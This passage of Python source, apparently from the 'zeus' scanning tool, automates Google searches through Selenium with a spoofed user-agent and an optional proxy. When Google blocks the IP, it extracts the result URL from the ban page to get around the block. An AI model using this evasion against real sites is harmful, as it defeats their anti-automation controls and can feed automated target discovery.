        logger.debug(set_color(
            "running selenium-webdriver and launching browser...", level=10
        ))

    if verbose:
        logger.debug(set_color(
            "adjusting selenium-webdriver user-agent to '{}'...".format(user_agent), level=10
        ))
    if proxy is not None:
        proxy_type = proxy.keys()
        proxy_to_use = Proxy({
            "proxyType": ProxyType.MANUAL,
            "httpProxy": proxy[proxy_type[0]],
            "ftpProxy": proxy[proxy_type[0]],
            "sslProxy": proxy[proxy_type[0]],
            "noProxy": ""
        })
        if verbose:
            logger.debug(set_color(
                "setting selenium proxy to '{}'...".format(
                    ''.join(proxy_type) + "://" + ''.join(proxy.values())
                ), level=10
            ))
    else:
        proxy_to_use = None

    profile = webdriver.FirefoxProfile()
    profile.set_preference("general.useragent.override", user_agent)
    browser = webdriver.Firefox(profile, proxy=proxy_to_use)
    logger.info(set_color("browser will open shortly..."))
    browser.get(url)
    if verbose:
        logger.debug(set_color(
            "searching search engine for the 'q' element (search button)...", level=10
        ))
    search = browser.find_element_by_name('q')
    logger.info(set_color(
        "searching '{}' using query '{}'...".format(url, query)
    ))
    try:
        search.send_keys(query)
        search.send_keys(Keys.RETURN)  # hit return after you enter search text
        time.sleep(3)
    except ElementNotInteractableException:
        browser.execute_script("document.querySelectorAll('label.boxed')[1].click()")
        search.send_keys(query)
        search.send_keys(Keys.RETURN)  # hit return after you enter search text
        time.sleep(3)
    if verbose:
        logger.debug(set_color(
            "obtaining URL from selenium..."
        ))
    try:
        retval = browser.current_url
    except UnexpectedAlertPresentException:
        logger.warning(set_color(
            "alert present, closing...", level=30
        ))
        alert = browser.switch_to.alert
        alert.accept()
        retval = browser.current_url
    ban_url_schema = ["http://ipv6.google.com", "http://ipv4.google.com"]
    if any(u in retval for u in ban_url_schema):  # if you got IP banned
        logger.warning(set_color(
            "it appears that Google is attempting to block your IP address, attempting bypass...", level=30
        ))
        try:
            retval = bypass_ip_block(retval)
            do_continue = prompt(
                "zeus was able to successfully extract the URL from Google's ban URL "
                "it is advised to shutdown zeus and attempt to extract the URL's manually. "
                "failing to do so will most likely result in no results being found by zeus. "
                "would you like to shutdown", opts="yN"
            )
            if not str(do_continue).lower().startswith("n"):  # shutdown and write the URL to a file
                write_to_log_file(retval, EXTRACTED_URL_LOG, "extracted-url-{}.log")
                logger.info(set_color(
                    "it is advised to use the built in blackwidow crawler with the extracted URL "
                    "(IE -b '{}')".format(retval)
                ))
                shutdown()
        except Exception as e:
            browser.close()  # stop all the random rogue processes
            ff_display.stop()
            logger.exception(set_color(
                "zeus was unable to extract the correct URL from the ban URL '{}', "
                "got exception '{}'...".format(
                    unquote(retval), e
                ), level=50
            ))
            request_issue_creation()
            shutdown()
    if verbose:
        logger.debug(set_color(
            "found current URL from selenium browser...", level=10
        ))
    logger.info(set_color(
        "closing the browser and continuing process.."
    ))
    browser.close()
    ff_display.stop()
    return retval